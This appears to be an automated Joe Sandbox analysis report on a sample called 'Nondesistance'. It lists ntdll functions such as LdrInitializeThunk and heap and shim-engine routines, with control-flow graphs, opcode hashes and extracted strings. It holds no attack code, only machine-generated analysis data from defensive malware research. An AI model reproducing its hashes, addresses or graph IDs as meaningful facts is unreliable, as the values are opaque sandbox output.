                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                  • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                  • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                  • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:23.8%
                                                                                                  Total number of Nodes:122
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 53055 32593259 189 API calls 53182 3250c850 361 API calls 53183 324f9046 214 API calls 53058 324f3640 190 API calls 53059 3251ea40 191 API calls 53184 324f1051 177 API calls 53185 324f1c50 174 API calls 53187 3256d87c 184 API calls 53063 324eb260 196 API calls 53188 324e7060 RtlDebugPrintTimes 53189 324e7860 176 API calls 53190 324f3c60 10 API calls 53065 32503660 228 API calls 53191 324e640d 415 API calls 53192 324eec0b 192 API calls 53069 324ee202 12 API calls 53070 324ea200 GetPEB 53071 324e6e00 RtlDebugPrintTimes RtlDebugPrintTimes 53072 324f3e01 175 API calls 53073 3251d600 476 API calls 53074 324e821b 184 API calls 53076 324e9610 306 API calls 53077 324e8e10 6 API calls 53198 324f2410 195 API calls 53199 324f9810 351 API calls 53080 32527a33 496 API calls 53082 32578633 429 API calls 53083 324eb620 177 API calls 53202 324eb420 182 API calls 53203 325af82b 18 API calls 53205 3257f42f 179 API calls 53085 32531e2f 188 API calls 53086 324f2e32 199 API calls 53087 324e7a30 182 API calls 53206 324eb830 411 API calls 53208 3251f4d0 186 API calls 53210 324eb0c0 198 API calls 53212 32526cc0 182 API calls 53090 325262f0 350 API calls 53091 325296f0 181 API calls 53216 3252a4f0 179 API calls 53092 324f3ee2 12 API calls 53093 324e72e0 GetPEB GetPEB GetPEB GetPEB GetPEB 53218 324f58e0 583 API calls 53094 325166e0 278 API calls 53220 325254e0 175 API calls 53221 325830ee 244 API calls 53097 3250d690 7 API calls 53098 324f8e8d 189 API calls 53222 3252b890 223 API calls 53099 32572e9f 249 API calls 53100 3251be80 GetPEB GetPEB 53101 324e9a99 GetPEB GetPEB RtlDebugPrintTimes GetPEB GetPEB 53103 324ea290 291 API calls 53104 324efe90 11 API calls 53224 324ec090 199 API calls 53225 324ee0a4 183 API calls 53108 324ebea0 188 API calls 53109 324f06a0 187 API calls 53226 324f00a0 373 API calls 53114 324e82b0 177 API calls 53115 325142af 204 API calls 53117 3252a350 198 API calls 53119 3252bb5b 178 API calls 53227 3252415f 178 API calls 53120 324ea740 283 API calls 53228 324ec140 184 API calls 53121 324eef5f 7 API calls 53230 3250e547 425 API calls 53233 324fb950 297 API calls 53125 3251a370 224 API calls 53126 3251af72 196 API calls 53127 32570371 176 API calls 53128 324fb360 11 API calls 53235 32570961 6 API calls 53129 324eef79 179 API calls 53236 324ec170 219 API calls 53131 324f1f70 199 API calls 53132 3251c310 10 API calls 53136 325a9313 12 API calls 53137 324ec301 215 API calls 53138 324f8f1e 188 API calls 53241 32525900 180 API calls 53139 3257330c 178 API calls 53242 3258d503 42 API calls 53140 3252bb0e 13 API calls 53243 3251510f 215 API calls 53244 3250d530 176 API calls 53144 324ebf20 200 API calls 53145 32528322 414 API calls 53147 3257d724 186 API calls 53249 32521527 181 API calls 53148 3257db2a 11 API calls 53151 32596bde 382 API calls 53152 324ee3c0 239 API calls 53153 324ebfc0 9 API calls 53251 324e81c0 175 API calls 53252 325051c0 187 API calls 53154 325adbcb 25 API calls 53155 325287c0 6 API calls 53253 3252c5c6 413 API calls 53160 32571fc9 210 API calls 53254 324ec1d0 178 API calls 53161 324f3bd0 7 API calls 53256 324f91e5 295 API calls 53163 32506fe0 226 API calls 53258 3251e9e0 181 API calls 53260 3252a5e7 GetPEB GetPEB LdrInitializeThunk 53165 324e73f0 GetPEB GetPEB GetPEB GetPEB 53166 324e7bf0 178 API calls 53167 3257af97 LdrInitializeThunk 53169 32529790 275 API calls 53052 32532b90 LdrInitializeThunk 53263 32522594 194 API calls 53265 32529580 192 API calls 53176 325cb781 176 API calls 53267 324ee9ac 220 API calls 53269 3252b9b0 8 API calls 53177 324f4fa8 183 API calls 53178 32528fbc 199 API calls 53180 325243a0 182 API calls 53181 325127a4 203 API calls

                                                                                                  Executed Functions

                                                                                                  Function 325334E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2 325334e0-325334ec LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 37eefc1884c9034e82548d95c39feb8ad8635d43df97a848f0b0f8582d0ad3a0
                                                                                                  • Instruction ID: 41a167c543dd8cbb15f5bcdc8f9d1d24ce89f6e8b4a89c9e3bd896fa179a3f20
                                                                                                  • Opcode Fuzzy Hash: 37eefc1884c9034e82548d95c39feb8ad8635d43df97a848f0b0f8582d0ad3a0
                                                                                                  • Instruction Fuzzy Hash: 0F90023160510402D50075589B28746504547D0211F61CC16A0414528DCBA58A5975A2
                                                                                                  Function 32532B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 32532b90-32532b9c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 09736a741fbcd68a31a7b882514b70bb3954a2383953c8de15f6d00a8362af16
                                                                                                  • Instruction ID: 66fa783c4b4c2accb7dc522b3369c1b2f836a06031c7fc11ec9b8a1f74925b2c
                                                                                                  • Opcode Fuzzy Hash: 09736a741fbcd68a31a7b882514b70bb3954a2383953c8de15f6d00a8362af16
                                                                                                  • Instruction Fuzzy Hash: 9C90023120108802D5107558DA1878A404547D0311F55CC16A4414618DCAA589997121
                                                                                                  Function 32532D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1 32532d10-32532d1c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e2f3f86a973ad9b6808b318ca6f96567dec7e1976fc8fb43821303f2e88fae9c
                                                                                                  • Instruction ID: 517a932533a3778022457ba6ed8bfee4659406d0d27c98b7443df9fc255b7795
                                                                                                  • Opcode Fuzzy Hash: e2f3f86a973ad9b6808b318ca6f96567dec7e1976fc8fb43821303f2e88fae9c
                                                                                                  • Instruction Fuzzy Hash: 6390023120100413D51175589B18747404947D0251F91CC17A0414518DDA668A5AB121

                                                                                                  Non-executed Functions

                                                                                                  Function 32599060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 554 32599060-325990a9 555 325990f8-32599107 554->555 556 325990ab-325990b0 554->556 557 325990b4-325990ba 555->557 558 32599109-3259910e 555->558 556->557 559 325990c0-325990e4 call 32538f40 557->559 560 32599215-3259923d call 32538f40 557->560 561 32599893-325998a7 call 32534b50 558->561 568 32599113-325991b4 GetPEB call 3259d7e5 559->568 569 325990e6-325990f3 call 325b92ab 559->569 570 3259925c-32599292 560->570 571 3259923f-3259925a call 325998aa 560->571 580 325991d2-325991e7 568->580 581 325991b6-325991c4 568->581 582 325991fd-32599210 RtlDebugPrintTimes 569->582 573 32599294-32599296 570->573 571->573 573->561 578 3259929c-325992b1 RtlDebugPrintTimes 573->578 578->561 588 325992b7-325992be 578->588 580->582 584 325991e9-325991ee 580->584 581->580 583 325991c6-325991cb 581->583 582->561 583->580 586 325991f0 584->586 587 325991f3-325991f6 584->587 586->587 587->582 588->561 590 325992c4-325992df 588->590 591 325992e3-325992f4 call 3259a388 590->591 594 325992fa-325992fc 591->594 595 32599891 591->595 594->561 596 32599302-32599309 594->596 595->561 597 3259947c-32599482 596->597 598 3259930f-32599314 596->598 599 32599488-325994b7 call 32538f40 597->599 600 3259961c-32599622 597->600 601 3259933c 598->601 602 32599316-3259931c 598->602 616 325994b9-325994c4 599->616 617 325994f0-32599505 599->617 605 32599674-32599679 600->605 606 32599624-3259962d 600->606 603 32599340-32599391 call 32538f40 RtlDebugPrintTimes 601->603 602->601 607 3259931e-32599332 602->607 603->561 643 32599397-3259939b 603->643 613 32599728-32599731 605->613 614 3259967f-32599687 605->614 606->591 612 32599633-3259966f call 32538f40 606->612 608 32599338-3259933a 607->608 609 32599334-32599336 607->609 608->603 609->603 637 32599869 612->637 613->591 618 32599737-3259973a 613->618 620 32599689-3259968d 614->620 621 32599693-325996bd call 32598093 614->621 623 325994cf-325994ee 616->623 624 325994c6-325994cd 616->624 628 32599511-32599518 617->628 629 32599507-32599509 617->629 625 325997fd-32599834 call 32538f40 618->625 626 32599740-3259978a 618->626 620->613 620->621 640 32599888-3259988c 621->640 641 325996c3-3259971e call 32538f40 RtlDebugPrintTimes 621->641 636 32599559-32599576 RtlDebugPrintTimes 623->636 624->623 654 3259983b-32599842 625->654 655 32599836 625->655 634 3259978c 626->634 635 32599791-3259979e 626->635 631 3259953d-3259953f 628->631 638 3259950b-3259950d 629->638 639 3259950f 629->639 644 3259951a-32599524 631->644 645 32599541-32599557 631->645 634->635 646 325997aa-325997ad 635->646 647 325997a0-325997a3 635->647 636->561 668 3259957c-3259959f call 32538f40 636->668 648 3259986d 637->648 638->628 639->628 640->591 641->561 686 32599724 641->686 656 325993eb-32599400 643->656 657 3259939d-325993a5 643->657 651 3259952d 644->651 652 32599526 644->652 645->636 649 325997b9-325997fb 646->649 650 325997af-325997b2 646->650 647->646 659 32599871-32599886 RtlDebugPrintTimes 648->659 649->659 650->649 662 3259952f-32599531 651->662 652->645 660 32599528-3259952b 652->660 663 3259984d 654->663 664 32599844-3259984b 654->664 655->654 667 32599406-32599414 656->667 665 325993d2-325993e9 657->665 666 325993a7-325993d0 call 32598093 657->666 659->561 659->640 660->662 672 3259953b 662->672 673 32599533-32599535 662->673 674 32599851-32599857 663->674 664->674 665->667 669 32599418-3259946f call 32538f40 RtlDebugPrintTimes 666->669 667->669 684 325995bd-325995d8 668->684 685 325995a1-325995bb 668->685 669->561 690 32599475-32599477 669->690 672->631 673->672 679 32599537-32599539 673->679 680 32599859-3259985c 674->680 681 3259985e-32599864 674->681 679->631 680->637 681->648 687 32599866 681->687 688 325995dd-3259960b RtlDebugPrintTimes 684->688 685->688 686->613 687->637 688->561 692 32599611-32599617 688->692 690->640 692->618
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $ $0
                                                                                                  • API String ID: 3446177414-3352262554
                                                                                                  • Opcode ID: e90d69a75c0735f6ce7255bfe0295134e6049a36b4e2ed5798c40ba4595a6118
                                                                                                  • Instruction ID: 7483766f8dafb18a5608e30aa374d36b1119c591b2a91fc6b2fc3ac336e92c83
                                                                                                  • Opcode Fuzzy Hash: e90d69a75c0735f6ce7255bfe0295134e6049a36b4e2ed5798c40ba4595a6118
                                                                                                  • Instruction Fuzzy Hash: A83213B56083818FE354CF68C984B9BBBE5BFC8348F40492EF59987250DB75DA48CB52
                                                                                                  Function 324ED2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1322 324ed2ec-324ed32d 1323 3254a69c 1322->1323 1324 324ed333-324ed335 1322->1324 1326 3254a6a6-3254a6bf call 325abd08 1323->1326 1324->1323 1325 324ed33b-324ed33e 1324->1325 1325->1323 1327 324ed344-324ed34c 1325->1327 1335 3254a6c5-3254a6c8 1326->1335 1336 324ed56a-324ed56d 1326->1336 1329 324ed34e-324ed350 1327->1329 1330 324ed356-324ed3a1 call 32535050 call 32532ab0 1327->1330 1329->1330 1332 3254a5f6-3254a5fb 1329->1332 1345 3254a600-3254a61a call 324e7220 1330->1345 1346 324ed3a7-324ed3b0 1330->1346 1334 324ed5c0-324ed5c8 1332->1334 1339 324ed54d-324ed54f 1335->1339 1338 324ed56f-324ed575 1336->1338 1342 324ed63b-324ed63d 1338->1342 1343 324ed57b-324ed588 GetPEB call 32503bc0 1338->1343 1339->1336 1341 324ed551-324ed564 call 32513262 1339->1341 1341->1336 1362 3254a6cd-3254a6d2 1341->1362 1347 324ed58d-324ed592 1342->1347 1343->1347 1366 3254a624-3254a628 1345->1366 1367 3254a61c-3254a61e 1345->1367 1350 324ed3ba-324ed3cd call 324ed736 1346->1350 1351 324ed3b2-324ed3b4 1346->1351 1354 324ed594-324ed59d call 32532a80 1347->1354 1355 324ed5a1-324ed5a6 1347->1355 1370 3254a658 1350->1370 1371 324ed3d3-324ed3d7 1350->1371 1351->1350 1357 3254a630-3254a63b call 325aad61 1351->1357 1354->1355 1359 324ed5a8-324ed5b1 call 32532a80 1355->1359 1360 324ed5b5-324ed5ba 1355->1360 1357->1350 1380 3254a641-3254a653 1357->1380 1359->1360 1360->1334 1368 3254a6d7-3254a6db call 32532a80 1360->1368 1362->1336 1366->1357 1367->1366 1373 324ed52e 1367->1373 1376 3254a6e0 1368->1376 1385 3254a660-3254a662 1370->1385 1378 324ed3dd-324ed3f7 call 324ed8d0 1371->1378 1379 324ed5cb-324ed623 call 32535050 call 32532ab0 1371->1379 1377 324ed530-324ed535 1373->1377 1376->1376 1381 324ed549 1377->1381 1382 324ed537-324ed539 1377->1382 1378->1385 1390 324ed3fd-324ed44e call 32535050 call 32532ab0 1378->1390 1396 324ed625 1379->1396 1397 324ed642-324ed645 1379->1397 1380->1350 1381->1339 1382->1326 1387 324ed53f-324ed543 1382->1387 1385->1336 1386 3254a668 1385->1386 1392 3254a66d 1386->1392 1387->1326 1387->1381 1390->1370 1402 324ed454-324ed45d 1390->1402 1398 3254a677-3254a67c 1392->1398 1401 324ed62f-324ed636 1396->1401 1397->1373 1398->1342 1401->1377 1402->1392 1403 324ed463-324ed492 call 32535050 call 324ed64a 1402->1403 1403->1401 1408 324ed498-324ed49e 1403->1408 1408->1401 1409 324ed4a4-324ed4aa 1408->1409 1409->1342 1410 324ed4b0-324ed4cc GetPEB call 32505d90 1409->1410 1410->1398 1413 324ed4d2-324ed4ef call 324ed64a 1410->1413 1416 324ed526-324ed52c 1413->1416 1417 324ed4f1-324ed4f6 1413->1417 1416->1338 1416->1373 1418 324ed4fc-324ed524 call 32514ca6 1417->1418 1419 3254a681-3254a686 1417->1419 1418->1416 1419->1418 1420 3254a68c-3254a697 1419->1420 1420->1377
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.Q2
                                                                                                  • API String ID: 0-902425605
                                                                                                  • Opcode ID: b94917a6476fbd9558712c81592f7813458a65424068201b8ce19f7afe0f827f
                                                                                                  • Instruction ID: f8cf1539222b909254ca099c2f6e440c7c4bffa7e0a2fa66a31422d66544a6a8
                                                                                                  • Opcode Fuzzy Hash: b94917a6476fbd9558712c81592f7813458a65424068201b8ce19f7afe0f827f
                                                                                                  • Instruction Fuzzy Hash: B3B18BB5908351DBE715CE24C850B5FBBE8AB88749F40492EF986D7300DB70DA49CB92
                                                                                                  Function 325986C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1547 325986c2-3259873a GetPEB call 324f0670 1550 32598740-3259875e call 324f42b0 1547->1550 1551 32598892-3259889a 1547->1551 1556 3259877f-32598787 1550->1556 1557 32598760-32598779 call 32537ad0 1550->1557 1552 3259889b-325988b0 call 32534b50 1551->1552 1560 32598789-3259879e call 32524f11 1556->1560 1561 325987b7-325987c0 1556->1561 1557->1551 1557->1556 1560->1551 1567 325987a4-325987ac 1560->1567 1561->1551 1564 325987c6-325987c8 1561->1564 1564->1552 1566 325987ce-325987dc 1564->1566 1568 325987e8-325987ee 1566->1568 1567->1551 1571 325987b2 1567->1571 1569 325987de-325987e2 1568->1569 1570 325987f0 1568->1570 1573 325987f2-325987f4 1569->1573 1574 325987e4-325987e5 1569->1574 1572 3259884f-32598875 call 32524e50 1570->1572 1571->1552 1572->1552 1579 32598877-32598890 call 32537ad0 1572->1579 1573->1572 1575 325987f6-325987ff 1573->1575 1574->1568 1575->1572 1577 32598801-32598803 1575->1577 1580 32598807-3259881b call 32537ad0 1577->1580 1579->1551 1579->1552 1585 32598839 1580->1585 1586 3259881d 1580->1586 1588 3259883d-3259884d 1585->1588 1587 32598820-32598829 1586->1587 1587->1587 1589 3259882b-32598835 1587->1589 1588->1572 1588->1580 1589->1551 1590 32598837 1589->1590 1590->1588
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  • Opcode ID: 3fc214265583949e06c785206db56e2b1d5e07973a7bfebc9637fcdad768a93e
                                                                                                  • Instruction ID: 1ee748aa449bda5509d89f5d9c17b44fdc02f055095daffdafc1e9b3d244da26
                                                                                                  • Opcode Fuzzy Hash: 3fc214265583949e06c785206db56e2b1d5e07973a7bfebc9637fcdad768a93e
                                                                                                  • Instruction Fuzzy Hash: 93518FB5504351ABD315CF19AA48BEBBBECEB84364F404D1DFA6983240EB71D704CBA2
                                                                                                  Function 3259F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                  • API String ID: 3446177414-1745908468
                                                                                                  • Opcode ID: 938aa628cd0b123c786862ed9728b9d356ee2781b7063b0b9c6386239e6f4b69
                                                                                                  • Instruction ID: 45d959fcb5753920410e8db78f00e6459d3e8a3bafea18cf32d66e257f5a68f4
                                                                                                  • Opcode Fuzzy Hash: 938aa628cd0b123c786862ed9728b9d356ee2781b7063b0b9c6386239e6f4b69
                                                                                                  • Instruction Fuzzy Hash: 6B91EC39911645EFEB02CFA8C840AEDBBF2FF49314F548859E845EB251CB7A9A41CB50
                                                                                                  Function 324E640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 324E651C
                                                                                                    • Part of subcall function 324E6565: RtlDebugPrintTimes.NTDLL ref: 324E6614
                                                                                                    • Part of subcall function 324E6565: RtlDebugPrintTimes.NTDLL ref: 324E665F
                                                                                                  Strings
                                                                                                  • LdrpInitShimEngine, xrefs: 32549783, 32549796, 325497BF
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3254977C
                                                                                                  • apphelp.dll, xrefs: 324E6446
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 325497B9
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32549790
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 325497A0, 325497C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-204845295
                                                                                                  • Opcode ID: e648ac12144ccbbfad363b5433b679f63b01f6e10fa62fe4b31ad4704c143790
                                                                                                  • Instruction ID: ad7bc6b9a1f3599022c894a0bc9173971cc4f633c6c836e02675de3ab9149327
                                                                                                  • Opcode Fuzzy Hash: e648ac12144ccbbfad363b5433b679f63b01f6e10fa62fe4b31ad4704c143790
                                                                                                  • Instruction Fuzzy Hash: 5551BD712493009FE314CF24D892EABB7E8EB84345F404D59FA85971A2DB70DB45CB92
                                                                                                  Function 324ED02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324ED263
                                                                                                  • @, xrefs: 324ED09D
                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324ED0E6
                                                                                                  • @, xrefs: 324ED2B3
                                                                                                  • @, xrefs: 324ED24F
                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324ED202
                                                                                                  • h.Q2, xrefs: 3254A5D2
                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324ED06F
                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 324ED136
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.Q2
                                                                                                  • API String ID: 0-4234794107
                                                                                                  • Opcode ID: c1a11a9ffdf0ee6d0306f091c9831e7a9d4ada03e8537a5da21ea8f2dfafc7e0
                                                                                                  • Instruction ID: d6d78e96008d26df4a072c337c2ae8d2274d39413c7ee2ecd7a8cdff2756664b
                                                                                                  • Opcode Fuzzy Hash: c1a11a9ffdf0ee6d0306f091c9831e7a9d4ada03e8537a5da21ea8f2dfafc7e0
                                                                                                  • Instruction Fuzzy Hash: 63A14DB5508345DFE722CF14C540B9BF7E8AB8875AF40492EFA8996240DB74DA48CF92
                                                                                                  Function 3251D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 3251D879
                                                                                                    • Part of subcall function 324F4779: RtlDebugPrintTimes.NTDLL ref: 324F4817
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-1975516107
                                                                                                  • Opcode ID: 2a38a8725328263a953186849bd632b2a7e3ea6e64fdb747d8d6a876cf5f912a
                                                                                                  • Instruction ID: 88c63b714d580abfe1a17e96bc3effc1677755c94597cc70a53bc2bafa5b26fc
                                                                                                  • Opcode Fuzzy Hash: 2a38a8725328263a953186849bd632b2a7e3ea6e64fdb747d8d6a876cf5f912a
